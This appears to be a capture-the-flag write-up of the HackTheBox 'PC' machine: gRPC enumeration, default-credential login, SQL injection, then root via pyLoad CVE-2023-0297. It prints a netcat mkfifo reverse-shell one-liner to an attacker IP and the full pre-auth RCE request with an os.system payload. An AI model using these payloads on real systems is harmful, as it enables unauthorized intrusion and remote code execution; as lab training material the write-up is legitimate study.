Post

PC - Easy - Linux

This box involved working with a protocol I’ve never seen before. There was an open port which was difficult to enumerate. An error message revealed it was probably related to gRPC. Postman was used to interact with the port and server reflection revealed the endpoints. After logging in with default credentials a token was granted. This token unlocked the ability to interact with the ID endpoint. SQL injection was used to exploit the endpoint and extract user credentials. Root involved port forwarding to access an interal port which was hosting an outdated version of pyLoad. A root shell was returned after exploiting pyLoad.

Nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.92 scan initiated Sat May 20 22:26:19 2023 as: nmap -sC -sV -p- -oA nmap/pc-allports -v 10.10.11.214
Nmap scan report for 10.10.11.214
Host is up (0.095s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
|   256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_  256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 20 22:28:45 2023 -- 1 IP address (1 host up) scanned in 145.99 seconds

Inspecting port 50051

After checking the port it revealed an error message. The error message suggested that it was related to gRPC. I have no experience with gRPC and after googling I found Postman which is an application that can interact with it.

Netcat

Netcat revealed the error message caused by a timeout. This error message was key to figuring out what service was running.

1
2
3
4
5
┌─[✗]─[parrot@parrotos]─[~/htb/pc]
└──╼ $nc -v 10.129.164.184 50051
10.129.164.184: inverse host lookup failed: Unknown host
(UNKNOWN) [10.129.164.184] 50051 (?) open
???@Did not receive HTTP/2 settings before handshake timeout

Curl

1
2
3
4
5
6
7
8
9
10
11
12
┌─[✗]─[parrot@parrotos]─[~/htb/pc]
└──╼ $curl -vvv 10.129.164.184:50051
*   Trying 10.129.164.184:50051...
* Connected to 10.129.164.184 (10.129.164.184) port 50051 (#0)
> GET / HTTP/1.1
> Host: 10.129.164.184:50051
> User-Agent: curl/7.88.1
> Accept: */*
> 
* Received HTTP/0.9 when not allowed
* Closing connection 0
curl: (1) Received HTTP/0.9 when not allowed

Port 50051 - gRPC - Postman

Postman was used to interact with gRPC. It was very simple to use and also supported server reflection which revealed all the endpoints automatically.

LoginUser endpoint

Token value of b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODg3OTk4NDN9.dK4LZzBsKAQ9MhcaoeV87Dgkm3qjMSwLJ4Nsun05IMQ' returned from logging in with admin:admin 33b19031c9d9c3dfc957a6000b77ca41.png

GetInfo endpoint

Allowing Postman to use server reflection allows the methods to be automatically generated. it expects an ID parameter passed as JSON. Giving it any number always leads to the below message.

ed9410ae2ac0580418557537224a6c68.png

SQL Injection

It was possible to use union injection to extract the username using the below payload.

549e310a69a003244104333b82ae5c4e.png

Modifying the initial payload to extract the password was also possible as shown below.

eb6f40994207e8bb5069721d5fcaa380.png

SSH - user sau

Logged into SSH as sau and captured the user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌─[parrot@parrotos]─[~/htb/pc]
└──╼ $ssh sau@10.129.164.184
The authenticity of host '10.129.164.184 (10.129.164.184)' can't be established.
ECDSA key fingerprint is SHA256:1g85rB6ht6M95bNqeghJZT5nAhCfSdKOoWWx7TE+5Ck.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.164.184' (ECDSA) to the list of known hosts.
sau@10.129.164.184's password: 
Last login: Mon May 15 09:00:44 2023 from 10.10.14.19
sau@pc:~$  ls -la
total 28
drwxr-xr-x 3 sau  sau  4096 Jan 11 18:09 .
drwxr-xr-x 3 root root 4096 Jan 11 18:10 ..
lrwxrwxrwx 1 root root    9 Jan 11 18:08 .bash_history -> /dev/null
-rw-r--r-- 1 sau  sau   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 sau  sau  3771 Feb 25  2020 .bashrc
drwx------ 2 sau  sau  4096 Jan 11 17:43 .cache
-rw-r--r-- 1 sau  sau   807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root    9 Jan 11 18:09 .viminfo -> /dev/null
-rw-r----- 1 root sau    33 Jul  8 03:55 user.txt
sau@pc:~$  

Inspecting service on localhost 8000

The local ports reveal a service running on port 8000 which is interesting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sau@pc:~$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      1 10.129.164.184:41156    1.1.1.1:53              SYN_SENT    -                   
tcp        0    200 10.129.164.184:22       10.10.14.10:37358       ESTABLISHED -                   
tcp6       0      0 :::50051                :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
sau@pc:~$ 

Accessing local port 8000 via SSH forward

Creating a local forward so I can access the port on my machine.

1
2
3
4
5
┌─[✗]─[parrot@parrotos]─[~/htb/pc]
└──╼ $ssh -L 127.0.0.1:8000:127.0.0.1:8000 sau@10.129.164.184
sau@10.129.164.184's password: 
Last login: Sat Jul  8 04:40:50 2023 from 10.10.14.10
sau@pc:~$ 

addac93492899c7b705485fda5d2d368.png

Inspecting pyLoad

pyLoad was using an outdated version.

1
2
3
4
5
6
sau@pc:~$ pyload -version
usage: pyload [-h] [-d] [-r] [--storagedir STORAGEDIR] [--userdir USERDIR] [--tempdir TEMPDIR]
              [--pidfile PIDFILE] [--dry-run] [--daemon] [--quit] [--status] [--version]
pyload: error: unrecognized arguments: -version
sau@pc:~$ pyload --version
pyLoad 0.5.0

CVE-2023-0297

It did not take long to find a proof of concept for this vulnerability. The payload was a simple request. I decided to save the payload on the file system and execute it via bash to keep the request free from bad characters.

Source: https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

Payload

Created a file with below contents in /tmp

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9001 >/tmp/f

Sent the below request to execute shell

1
2
3
4
5
6
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

jk=pyimport%20os;os.system("bash+/tmp/shell");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa

Root shell returned

Root flag captured.

1
2
3
4
5
6
7
8
9
10
┌─[parrot@parrotos]─[~/htb/pc]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.164.184] 43976
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
5c603e3b2a9e73b19a9ba34ce14148cc
# 
This post is licensed under CC BY 4.0 by the author.